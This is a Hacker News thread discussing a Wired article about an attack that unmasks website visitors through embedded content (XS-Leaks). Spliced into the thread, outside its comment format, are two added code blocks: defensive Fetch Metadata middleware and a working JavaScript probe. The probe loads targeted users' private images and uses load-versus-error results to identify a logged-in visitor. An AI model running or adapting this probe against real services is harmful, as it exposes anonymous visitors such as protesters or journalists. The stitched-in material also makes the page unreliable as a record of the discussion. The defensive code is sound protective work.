[HN Gopher] A new attack can unmask anonymous users on any major...
___________________________________________________________________
A new attack can unmask anonymous users on any major browser (2022)
Author : tysone
Score : 49 points
Date : 2023-06-02 19:16 UTC (3 hours ago)
(HTM) web link (www.wired.com)
(TXT) w3m dump (www.wired.com)
| j-bos wrote:
| Is this new? Seems like a long present low hanging fruit.
| omgmajk wrote:
| Article from 2022.
| saxonww wrote:
| Firefox container mode stops this. I can imagine a product that
| makes every tab an ephemeral container by default, and you had to
| explicitly opt-in to a container profile to share cookies, etc.
| cross-tab.
| pwgentleman wrote:
| Yeah there's an extension called Temporary containers that does
| exactly that (^:
| ravenstine wrote:
| Even better, type "about:profiles" into your URL bar, create a
| new profile that runs in an entirely separate Firefox process,
| and live your second life there.
| xjay wrote:
| Disable automatic updates in this case (Windows).
|
| When an update is applied between the first and second
| profile process, any new tab won't do anything in any of the
| instances. Firefox likely still doesn't detect this state.
|
| Edit: That is, if you use Firefox with two or more profiles,
| and may start one profile later (after a new update was
| published).
| Aachen wrote:
| If you're linked to something on twitter or discord or so, odds
| are that you'll open it in that container because that's the
| default behavior. While you're right, and I use containers as
| well, I'm not sure that's a solid way to prevent this attack
| unless the person can be convinced to diligently right click
| anything they wish to open, copy the link, and manually paste
| it in a fresh new tab.
| fsflover wrote:
| This is solved in Qubes OS by using separate VMs for
| different security domains. For Discord, a single click can
| be configured to open a browser in a dedicated disposable VM.
| Izkata wrote:
| Relevant paragraphs:
|
| > How this de-anonymization attack works is difficult to explain
| but relatively easy to grasp once you have the gist. Someone
| carrying out the attack needs a few things to get started: a
| website they control, a list of accounts tied to people they want
| to identify as having visited that site, and content posted to
| the platforms of the accounts on their target list that either
| allows the targeted accounts to view that content or blocks them
| from viewing it--the attack works both ways.
|
| > Next, the attacker embeds the aforementioned content on the
| malicious website. Then they wait to see who clicks. If anyone on
| the targeted list visits the site, the attackers will know who
| they are by analyzing which users can (or cannot) view the
| embedded content.
|
| > The attack takes advantage of a number of factors most people
| likely take for granted: Many major services--from YouTube to
| Dropbox--allow users to host media and embed it on a third-party
| website. Regular users typically have an account with these
| ubiquitous services and, crucially, they often stay logged into
| these platforms on their phones or computers.
|
| Isn't this one of the older forms of de-anonymization? And this
| is pretty visible to the user too, embeds hint to even non-
| technical people they can be tracked across websites.
| Aachen wrote:
| > And this is pretty visible to the user too
|
| How would even a tech savvy person know of this going on in the
| background, without being suspicious a priori? Embedded frames
| can be made invisible, overlaid with something else, or put
| off-screen. You'd have to be very familiar with this attacker's
| site to know that it's unusually slow today and loading longer
| than usual, or showing it's loading while the page appears to
| be already fully loaded. With the gigabytes of javascript that
| are common nowadays, that's not unusual.
|
| The riskiest part is probably the sharing, as email
| notifications of such actions are commonly sent out.
| Izkata wrote:
| Embeds in general can lead to this suspicion, not the attack
| itself. I've seen people question "why am I logged in to
| these Facebook comments? Does Facebook know I visited this
| site?", which then leads to them discovering recommendations
| that others have commented on here. They don't even need to
| know anything technical beyond "install this addon to stop
| Facebook from spying on you" and poof, this attack doesn't
| work anymore.
| ls612 wrote:
| I'd also assume that ublockorigin will stop most of this in
| its tracks.
| Aachen wrote:
| TL;DR (the crucial info is, predictably, at the very end): share
| a picture with someone via dropbox or whatever and embed that
| dropbox page on a website you control, then "analyze accessible
| information about the target's browser and the behavior of their
| processor as the request is happening to make an inference about
| whether the content request was allowed or denied."
|
| So you can confirm via unspecified vectors whether a visitor is
| among a specific set of persons if they are logged in with the
| right user account. (Not exactly a way to unmask any anonymous
| user on any major platform, the way the headline sounds.)
|
| Edit: oh, it's not at the very end. Beyond the horizontal line
| and newsletter begging there's a few more paragraphs I didn't see
| before. Credit where it's due, they didn't bury it at the end
| but, instead, only 988 words stand between you and the above
| information!
| Blahah wrote:
| https://archive.is/neUxt
| Izkata wrote:
| Oh haha this might be an attack itself:
|
| > The researchers developed a browser extension that can thwart
| such attacks, and it is available for Chrome and Firefox. But
| they note that it may impact performance and isn't available for
| all browsers.
|
| And if you click through to the Firefox one...
|
| > This add-on is not actively monitored for security by Mozilla.
| Make sure you trust it before installing.
| JBiserkov wrote:
| The target demographic selects itself ;-)
| notjulianjaynes wrote:
| I am pretty sure that how it works is almost every Firefox add-
| on that isn't in their recommended add-ons has this warning.
| Izkata wrote:
| As far as I know they can get it reviewed without reaching
| "recommended" status. My point is these are security
| researchers that didn't bother getting it reviewed. Surely
| they'd go through the effort to get it reviewed if they
| really wanted to convince people it was safe, right? Seems to
| imply to me there's something that would get it removed if
| Mozilla did review it.
|
| Edit: I guess maybe reviewed and recommended are the same (I
| swear they were different at one point), but there is an
| email you can send to suggest extensions to reach this
| status.
| kodah wrote:
| > "If you're an average internet user, you may not think too much
| about your privacy when you visit a random website," says Reza
| Curtmola, one of the study authors and a computer science
| professor at NJIT. "But there are certain categories of internet
| users who may be more significantly impacted by this, like people
| who organize and participate in political protest, journalists,
| and people who network with fellow members of their minority
| group."
|
| I get so dizzied by statements like this. It's almost as if
| researchers want to undermine their own work. Privacy can be
| _essential_ for certain groups, but it should be a priority for
| everyone. Frankly I'm not even sure the statement about minority
| groups is true anymore. We've seen unmasking used by
| corporations, interest groups, governments, etc against a wide
| variety of people with dangerous outcomes.
|
| I'd prefer we refactor messaging to make people realize that this
| is important to everyone and that we lay an impetus to do
| something about it, especially as governments all over the world
| are moving to eliminate personal and online privacy.
| therealcyclist wrote:
| [flagged]
| Sunspark wrote:
| Combined with AI/ML this would be useful for PaaS to provide a
| curated offering of porn, except for those from Louisiana.
| green_boons wrote:
| There was a similar attack from a couple years ago that checked
| if favicons for sites were cached and then polled them.
| lelandfe wrote:
| It's a classic problem. It's also why :visited was limited, why
| caches were partitioned, etc.
| throwawayadvsec wrote:
| Wouldn't that be stopped by CORS blocking which is pretty much
| the norm for large websites?
| lincolnq wrote:
| Iframes bypass CORS, so the trick is to use an Iframe and
| figure out (using some side channel since you can't peek into
| the frame) whether the iframe loaded the content successfully
| or whether it loaded an error page.
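The exchange above turns on a distinction worth making concrete: CORS decides whether cross-origin script may read a response, but it does not stop the browser from sending the request with the victim's cookies, and an embed only needs "did it load?" to leak. The following is an added example, not code from the article or from any commenter: a server-side check on the Fetch Metadata request headers (Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest) that refuses cross-site subresource loads of a sensitive resource before any per-user logic runs. The protected route, the request shape and the policy choices (allow only top-level GET navigations cross-site) are assumptions for illustration, modelled on a common resource-isolation policy rather than anything the page prescribes.

```javascript
// Added example, not code from the article or any commenter.
// Fetch Metadata resource isolation: browsers attach Sec-Fetch-* headers
// to every request, so a server can tell a cross-site <img>/<iframe>/
// fetch() from a same-site one and refuse it before touching user data.
// CORS never helped here: the probe page never reads the response.

const PROTECTED_PATH = /^\/users\/\d+\/private_pic$/; // hypothetical route

function isAllowedBySecFetch(headers, method) {
  const site = (headers['sec-fetch-site'] || '').toLowerCase();
  const mode = (headers['sec-fetch-mode'] || '').toLowerCase();
  const dest = (headers['sec-fetch-dest'] || '').toLowerCase();

  // No Fetch Metadata: an older browser or a non-browser client. Those
  // cannot be driven into carrying a victim's cookies by a third-party
  // page, so allow them (a stricter deployment may require the header).
  if (site === '') return true;

  // Same-origin, same-site, or user-initiated (typed URL, bookmark).
  if (site === 'same-origin' || site === 'same-site' || site === 'none') return true;

  // Cross-site: permit only a plain top-level GET navigation so links
  // from other sites keep working. Images, scripts, fetch() calls and
  // frames (dest 'iframe') embedded by another site are exactly what an
  // onload/onerror oracle needs, so they are refused.
  return method.toUpperCase() === 'GET' && mode === 'navigate' && dest === 'document';
}

// Returns the status the caller (an Express middleware, a raw http
// handler) should send. 403 for every refused request, whether or not
// the user in the URL exists, so the error path is not a new oracle.
function decide(req) {
  if (!PROTECTED_PATH.test(req.path)) return 200;
  return isAllowedBySecFetch(req.headers, req.method) ? 200 : 403;
}

// Response header to send on the protected resource as well: with CORP
// the browser refuses to hand a cross-site embed the response regardless
// of what the server answered, so load-vs-error no longer encodes who
// the visitor is even if the check above is bypassed or misconfigured.
function protectedResponseHeaders() {
  return { 'Cross-Origin-Resource-Policy': 'same-site' };
}
```

Run `decide` on the request before the route handler; the point of ordering it first is that a cross-site probe is answered identically for every user ID, so neither the status nor the handler's timing depends on whose picture was asked for.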
| veeberz wrote:
| There's a type of side-channel attack you can do to get around
| CORS but still leak limited information.
|
| Suppose you want to detect whether one of N pre-chosen users of
| FakeMail (a service I made up) have visited a malicious page
| you control. Let's also say that in FakeMail:
|
| 1. you can see a hi-res version of your profile pic only if
| you're authenticated
|
| 2. only you can see your own hi-res profile pic
|
| 3. the path to this private pic is unique to each user, e.g.
| `/users/{user_id}/private_pic`
|
| The trick then is to embed an `<img>` tag with a `src` to this
| private, hi-res profile pic for each of the N pre-chosen
| targets in your malicious page. Then, in `onerror` and `onload`
| event handlers of `img`, you can implement logic to handle
| "user X is not here" and "user X is here" respectively.
|
| Of course, this attack could be thwarted by SameSite cookies or
| browsers with protection against cross-site use of cookies. And
| it's rather hard to find FakeMail's exact three conditions
| needed to pull off such an attack. AND just add one more, your
| targets have to be authenticated to FakeMail. It might seem
| like an attack that's not viable, but this has happened before,
| and iirc it was called XS-Leaks for a while when I first heard
| of it.
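The comment above describes the mechanism precisely enough to write it down. What follows is an added example, not code from the article, from the researchers, or from the commenter: the `<img>` onload/onerror probe for the hypothetical FakeMail, with the load/error classification kept in a pure function so the same logic runs in a browser page or, with a simulated browser and FakeMail, offline under Node. FakeMail, its URL template, the user IDs and the target names are assumptions for illustration; the simulation also models the SameSite case the comment mentions, where the cookie is simply not attached to a cross-site image request.

```javascript
// Added example, not code from the article or any commenter: the
// <img> onload/onerror XS-Leak sketched above. FakeMail, its URL
// template and the user IDs are hypothetical.

// Hypothetical private-resource path (condition 3 in the comment).
const PRIVATE_PIC = 'https://fakemail.example/users/{user_id}/private_pic';

// Hypothetical target list: the N accounts the attacker wants to detect.
const TARGETS = [
  { name: 'alice', userId: 1001 },
  { name: 'bob', userId: 1002 },
  { name: 'carol', userId: 1003 },
];

function probeUrl(userId) {
  return PRIVATE_PIC.replace('{user_id}', String(userId));
}

// Browser loader: an <img> request is a plain cross-site subresource
// fetch. It carries FakeMail's cookies unless they are SameSite or the
// browser partitions third-party cookies, and the page never reads the
// pixels, so CORS never comes into play. Only load-vs-error is observed.
function browserImageLoader(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve('load');
    img.onerror = () => resolve('error');
    img.src = url;
  });
}

// Decide what a set of probe outcomes means. Exactly one 'load' means
// the visitor is signed in as that user. Zero means they are not on the
// list, are logged out, or the cookie was not sent. More than one means
// condition 2 ("only you can see your own pic") does not hold, so the
// result is noise rather than an identification.
function classify(outcomes) {
  const loaded = outcomes.filter((o) => o.outcome === 'load');
  return loaded.length === 1 ? loaded[0].name : null;
}

// Browser entry point: probe every target concurrently.
async function identifyVisitor(targets = TARGETS, loader = browserImageLoader) {
  const outcomes = await Promise.all(
    targets.map(async (t) => ({ ...t, outcome: await loader(probeUrl(t.userId)) }))
  );
  return classify(outcomes);
}

// Offline simulation of the victim's browser plus FakeMail's access
// rule (conditions 1 and 2): the picture loads only when the request
// carries the owner's session cookie. A SameSite cookie is not attached
// to a cross-site <img> request at all, so every probe errors.
function simulateVisit(sessionUserId, cookieIsSameSite, targets = TARGETS) {
  const loader = (url) => {
    const m = /\/users\/(\d+)\/private_pic$/.exec(url);
    const cookieSent = sessionUserId !== null && !cookieIsSameSite;
    return m && cookieSent && Number(m[1]) === sessionUserId ? 'load' : 'error';
  };
  return classify(targets.map((t) => ({ ...t, outcome: loader(probeUrl(t.userId)) })));
}
```

In a page, `identifyVisitor()` is all the attacker runs; the probes are ordinary image loads, which is why a content blocker that refuses third-party requests, or a browser that does not send the cookie cross-site, makes every outcome `error` and the classifier return nothing.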
| Semaphor wrote:
| Seems like anyone using a third party content blocker like
| uMatrix will be immune.
| myshpa wrote:
| uMatrix is a lifesaver ... I enable only css, images and media
| for 1st party sites, everything else is disabled by default.
|
| Have not seen an ad in years.
___________________________________________________________________
(page generated 2023-06-02 23:00 UTC)